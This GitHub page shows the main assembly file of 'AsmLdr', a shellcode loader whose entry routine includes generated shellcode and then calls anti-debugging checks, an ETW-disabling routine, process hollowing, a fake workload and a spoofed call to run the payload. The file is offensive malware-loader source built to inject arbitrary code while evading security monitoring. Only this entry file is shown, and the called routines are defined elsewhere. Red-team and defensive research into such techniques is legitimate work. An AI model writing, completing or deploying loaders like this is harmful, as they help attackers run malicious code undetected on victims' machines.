AsmLdr/main.asm at main · 0xNinjaCyclone/AsmLdr · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
;----------------------------------------------------;
; Author	=> Abdallah Mohamed (@0xNinjaCyclone)    ;
; Email		=> elsharifabdallah53@gmail.com          ;
; Date		=> September 01, 2025                    ;
;----------------------------------------------------;

include shellcode.asm

IFNDEF SHELLCODE
	.ERR <"Run `generate.py` and rebuild again -_-">
ENDIF

include evader.inc

.data

extern szNtdll:word
extern szK32:word

public hNtDll
hNtDll qword ?
public pProcEnvBlock
pProcEnvBlock qword ?
public dwProcId
dwProcId dword 00h
public dwThreadId
dwThreadId dword 00h
public hThread
hThread qword 00h

.code

extern hollow:proc
extern f_ckoff_etw:proc
extern ldr_exit:proc
extern fake_workload:proc
extern start_fake_workload:proc
extern calm_before_storm:proc

AsmLdr proc
	INIT_ASMLDR
	KILL_DEBUGGERS
	call f_ckoff_etw
    call hollow
	test rax, rax
	jz ldr_finish
	push rax
	call calm_before_storm
	call SpoofCall
	ldr_finish:
	ret
AsmLdr endp

end